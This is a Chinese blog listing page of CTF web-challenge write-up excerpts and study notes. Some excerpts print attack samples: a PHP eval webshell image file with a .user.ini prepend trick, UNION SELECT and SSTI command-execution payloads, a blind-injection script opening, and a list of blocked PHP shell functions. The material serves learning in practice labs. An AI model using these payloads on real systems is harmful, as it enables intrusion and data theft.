自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(42)
  • 收藏
  • 关注

原创 对CTF中flask SSTI的研究

...

2022-10-14 10:35:28 535 1

转载 PHP_INCLUDE_TO_SHELL_CHAR_DICT

php

2022-09-10 12:29:39 322

原创 python模板注入那些坑:

python模板注入

2022-07-31 10:34:56 921

原创 vulnhub Me-and-My-Girlfriend-1

web安全

2022-07-14 21:14:28 1219

原创 [ISITDTU 2019]EasyPHP 之草稿笔记(仅为草稿)

/

2022-06-05 20:29:45 535

原创 [CISCN 2019 初赛]Love Math

[CISCN 2019 初赛]Love Math分析:<?phperror_reporting(0);//听说你很喜欢数学,不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){ show_source(__FILE__);}else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); }

2022-05-17 17:58:55 327

原创 ctf常见编码

base32:https://www.qqxiuzi.cn/bianma/base.phpIJQXGZJTGLT3ZFXHUCA6RJ5D46QIC===base64:https://www.base64decode.org/RW5jb2RlIHRvIEJhc2U2NCBmb3JtYXQ=md5:https://www.cmd5.com/hash.aspxe10adc3949ba59abbe56e057f20f883eunicode:http://www.jsons.cn/unic

2022-05-08 23:03:10 5335

原创 [FBCTF2019]RCEService

[FBCTF2019]RCEService看了4、5个wp,都是直接上源码,说是比赛时题目给了源码?<?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacking attempt detected<br/><br/>

2022-05-02 17:23:45 1015

原创 正则表达式浅谈

1.修饰符(g、i、m、s)g是一行的全局、m是多行都能匹配;i是大小写都行、s是说有字符;2.正则表达式的应用编辑器的词法分析器网站上注册表单爬虫中提取信息搜索查找3.限定符(?、*、+、{ })?0次或是一次:可以有或者没有used?----use或者used* 0次或是多次:可以没有也可以有多次ab*c-----ac、abc、abbc+ 1次或多次:至少得有一次,可以多次ab+c-----abc、abbc、abbbc{}给定具体范围ab{

2022-05-01 11:18:32 348

原创 本周web题

[BSidesCF 2019]Kookie[BJDCTF2020]ZJCTF,不过如此CTFHUB find_it[CISCN2019 华北赛区 Day2 Web1]Hack World

2022-04-24 17:39:21 191

原创 [极客大挑战 2019]RCE ME

[极客大挑战 2019]RCE ME<?phperror_reporting(0);if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); } if(preg_match("/[A-Za-z0-9]+/",$code)){ die("NO."); } @

2022-04-24 17:33:56 1782

原创 [CISCN2019 华北赛区 Day2 Web1]Hack World

[CISCN2019 华北赛区 Day2 Web1]Hack World注入题:直接抓包burpsuite fuzz测试过滤了一些关键字,但能够看出来存在bool漏洞发现当true时,Hello,glzjin wants a girlfriend.fslse时,Error Occured When Fetch Result.据此,写脚本import requestsimport stringimport timetimeout=Nonedef bool_blind(url):

2022-04-24 11:26:11 614

原创 CTFHUB find_it

CTFHUB find_itdirsearch扫描robots.txtWhen I was a child,I also like to read Robots.txtHere is what you want: 1ndexx.php1ndexx.php无法访问;扫缓存.1ndexx.php.swp[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tzCdf50K-1650768257307)(C:\Users\27969\AppData\Roaming\Ty

2022-04-24 10:44:39 3498

原创 [BJDCTF2020]ZJCTF,不过如此

[BJDCTF2020]ZJCTF,不过如此error_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></b

2022-04-22 22:30:49 1372

原创 [BSidesCF 2019]Kookie

[BSidesCF 2019]Kookie根据题目,这题和cookie逃不了关系先用admin登录一下,提示无效的用户名和密码再看payload/?action=login&username=admin&password=admin传的是username和password,前面提示是cookie,那就用cookie传一下这里说的意思应该是我们的用户名是admin&password=admin这样的话吧后面的&password=admin去掉就好了

2022-04-20 21:44:15 440

原创 python相关

session和cookieimport requestsurl = "www.baidu.com"session = requests.session()session.post(url)url = "www.daidu22.com"res = session.post(url)print(res.json())防盗链和referenceimport requests代理proxyimport requests#代理proxies = { "https":"h

2022-04-17 20:23:12 359

原创 [BUUCTF 2018]Online Tool

[BUUCTF 2018]Online Tool打开看到一串代码php代码审计:<?phpif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];}if(!isset($_GET['host'])) { highlight_file(__FILE__);} else { $host = $_GET['h

2022-04-17 20:18:04 1261

原创 [SUCTF 2019]CheckIn

[SUCTF 2019]CheckIn不怎么看感觉就是一个文件上传,再加上checkin,感觉不难== 结果.user.ini+图片马+index.php三者缺一不可,图片马内容:文件名m.jpgGIF89a?<script language="php">@eval($_POST["web"]);</script>.user.ini内容:GIF89aauto_prepend_file=m.jpgflag{55134a88-950d-4115-af3b-

2022-04-16 21:44:13 773

原创 [b01lers2020]Life on Mars

[b01lers2020]Life on Mars/query?search=hesperia_planum union select database(),group_concat(schema_name) from information_schema.schemata得到库名:aliens、alien_code/query?search=hesperia_planum union select database(),group_concat(table_name) from informat

2022-04-16 15:39:37 264

原创 [BJDCTF2020]The mystery of ip

[BJDCTF2020]The mystery of ip查看hint,在源码中找到提示:<!-- Do you know why i know your ip? -->能获取ip的有remote_addr和X-Forwarded-For等了解了一下X-Forwarded-For可以伪造不是SQL注入,看wp是SSTI注入:SSTI模板注入,看的有些晕{{1+1}}:返回了2,可以执行命令{{system('find / -name flag')}}/flag输入命令{{

2022-04-16 15:38:08 91

原创 [网鼎杯 2018]Fakebook

[网鼎杯 2018]Fakebook(fake:赝品;假货;冒充者dirsearch扫出来:db.phperror.php/cssuser.phpview.php flag.phprobots.txt#能访问的就robots.txt 和 view.php 在robots.txt里发现user.php.bak下载得到php文件,代码审计:<?phpclass UserInfo{ public $name = ""; public $age = 0

2022-04-12 18:51:47 1144

原创 [安洵杯 2019]easy_serialize_php

[安洵杯 2019]easy_serialize_php代码审计<?php$function = @$_GET['f'];function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img);}if($_SES

2022-04-09 20:23:26 1163

原创 [网鼎杯 2020 朱雀组]phpweb

[网鼎杯 2020 朱雀组]phpweb抓包发现func=data&p=Y-m-d h:i:s a大概就是传进去一个函数名给你执行,传file_get_contents,index.php得到一下面的内容代码审计 <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc

2022-04-09 20:18:58 303

原创 [网鼎杯 2020 青龙组]AreUSerialz

[网鼎杯 2020 青龙组]AreUSerialz一上来就代码审计<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tm

2022-04-06 17:56:58 1390

原创 [ZJCTF 2019]NiZhuanSiWei

[ZJCTF 2019]NiZhuanSiWei先搞不会的知识点:1.file_get_contents()将文件读入到一个字符串并返回。file() 函数把整个文件读入一个数组中。漏洞:file_get_contents()可以使用伪协议绕过解题:php代码审计<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(fil

2022-04-05 11:03:35 439

原创 3.28-4.3周报

3.28-4.3周报这周的感觉是学习特别没计划,东西很零散,今天说要学python,明天遇到php的函数看不懂又想着学php,学了些机器学习的相关入门的数据分析,本来计划每天留出点时间学一下,第二天就又没什么动力了。对密码学也挺感兴趣的,就又学了RSA算法,发现自己信安数学基础不太牢靠。misc也是想起来了才写一写。web的东西,主要在看一些漏洞的介绍,想着下一步学哪个漏洞,是继续挖sql注入,upload等,还是学不了解的漏洞,或者是比赛中常见的漏洞,现在也还没什么思路还在继续了解中,同时也稍微完善一

2022-04-03 20:46:03 973

原创 题目-[安洵杯 2019]easy_web

3X05题目-[安洵杯 2019]easy_webimg参数两次base64解码一次hex解码得到555.png相反index.php经过反步骤得到TmprMlpUWTBOalUzT0RKbE56QTJPRGN3替换之后得到base64编码解码后得到php代码<?phperror_reporting(E_ALL || ~ E_NOTICE);header('content-type:text/html;charset=utf-8');$cmd = $_GET['cmd'];if (!i

2022-03-20 22:28:18 1665

原创 周记14-20

3.14-3.20总结:技术学习:1.周六周日参加了虎符CTF,和校内天梯赛竞赛,ctf是菜到爆,就会签到题。。校内天梯赛,还好一个寒假没写过程序题了,也没报太大希望,结果3小时坚持下来还前30了,,不过和第一的差距不止那么一点点,隔着个海似的,不过毕竟也不是打算法的。2.有在完成明理杯参赛论文,和队友飞书会议讨论修改论文内容等,忙了几个晚上。3.有在尝试独立解web题目,但真的解不出来哇。ctf比赛时还是感觉misc稍微简单一些,不过真正做起来也不容易。4.服务器的事没怎么打理,命令还是都不会,

2022-03-20 21:38:56 115

原创 MD5总结

以上三篇文章,均为MD5相关的题目:总结一下吧就存在MD5密码登录绕过的,ffifdyop万能密码存在MD5弱类型比较的,可以用数组或者md5碰撞好像还有hash长度扩展攻击,太菜这个题目还没解决。...

2022-03-20 20:56:11 90

原创 题目-[MRCTF2020]Ez_bypass

3X03题目-[MRCTF2020]Ez_bypassaz,一下子就出来了GET:?id[]=1&gg[]=2POST:passwd=1234567asd

2022-03-20 20:34:34 113

原创 [BJDCTF2020]Easy MD5

3X02题目-[BJDCTF2020]Easy MD5ffifdyop存在MD5密码登录绕过的,ffifdyop万能密码存在MD5弱类型比较的,可以用数组或者md5碰撞之后转到levels91.php查看源码发现一段php代码<!--$a = $GET['a'];$b = $_GET['b'];if($a != $b && md5($a) == md5($b)){ // wow, glzjin wants a girl friend.-->存

2022-03-20 20:32:51 2056

原创 题目-[极客大挑战 2019]BuyFlag

3X01题目-[极客大挑战 2019]BuyFlag拿到网站F12检查发现了pay.php和index.phppay.php是要去买flag:接着在注释里发现了一段php代码:<!-- ~~~post money and password~~~if (isset($_POST['password'])) { $password = $_POST['password']; if (is_numeric($password)) { echo "password can't be n

2022-03-20 20:30:07 3230

原创 --周报--

3.7-3.13周报简述:1.这周太忙了,而且大多数没和学习相关,简单记录一下,后面补上。2.这周主要用于科二+科三练车时间,以及晚上的学习时间。3.对于学校的课程数学,物理,信安数基,都纯在一定程度的不牢固。4.一些空闲时间都用在明理杯的项目上了。总结:这周总体感受就是白天太忙了,有时候一些课都顾不了听,晚上又要写作业,讨论明理杯的项目,和一些其他的杂事,相比于前面几周,明显对于web安全漏洞的知识学习的变少了许多。而且就我感觉,sql漏洞只是会写题,一些有深度的东西还都没去研究,没详细的去

2022-03-13 22:03:26 1685

原创 buuctf-web作业wp

1x01题目-[HCTF 2018]WarmUp知识点:php代码审计--php的基础知识总结:对字符串处理的一些函数:empty(),判断是否空is_string(),判断是否为字符串urldecode(),进行url解码in_array(),mb_substr(),针对中文的字符串分割mb_strpos(),针对中文的字符串出现的位置1x02题目-[极客大挑战 2019]Havefun知识点:无—超级简单的php代码审计吧算解题:百年一遇的简单题(看能不能抓住机会了,

2022-03-05 21:03:58 1597

原创 labs_writeup

xss-labs writeup注入标签<script></script>onclick="javascript:alert(1);" onkeydown=""<a href="javascript:alert(1)">abc<a>type="hidden"过滤-绕过大小写绕过重写绕过upload-labs writeup各关卡知识点:1.前端js对php后缀的限制2.对content-type的限制3.后缀绕过phtml

2022-02-26 20:59:03 1965

原创 buuctf-web作业总结

buuctf-web作业总结0x01题目-[极客大挑战 2019]EasySQL知识点:sql注入-万能密码(没有过滤的简单题解题:看见题目easysql+登录框,判定sql注入,登录框输入' or 1=1# ,密码随意输一个 看下效果,成功!总结:对sql注入题目的判定(题目提示+输入框)sql注入万能密码,(账号在前,密码在后,#把后面的注释掉就随意填密码了)既然总结就多写点sql注入常见注释符(绕过过滤符号的题目)#%23 (url编码)GET方式可用,POST方式不可

2022-02-14 23:14:04 2324

原创 贪吃蛇js部分 框架和思路

思维导图js代码var sw = 20, sh = 20, td = 30, tr = 30;var snake = null, food = null, game = null;function square(x,y,classname){ this.x = x*sw; this.y = y*sh; this.class = classname; this.viewContent = document.createElement("div"); this.viewCont

2022-01-23 22:11:47 459

原创 misc常见编码题目总结

misc常见编码题目总结1.题目011000010101011100111001 011010110110000101101110011101000011011001100001010001000100011001101101010100010100100001000010011011110101100000110011011000110111011101011000001100110100000101111000011001000110110101

2022-01-22 22:48:59 1262

原创 静态百度页面

ps:css属性的值来自于百度代码(某些地方过于简化<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scal

2022-01-09 22:52:31 355

原创 JS DOM操作练习

JS和数学图像结合,dom操作练习效果图如下代码冗杂,功能也不太完善,还有很多缺点<!DOCTYPE html><html><head> <title>demo</title></head><body> <input id="btnClick1" type="button" value="sin" onclick="sin1();sin2();"/> <inpu..

2022-01-09 19:10:07 585

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除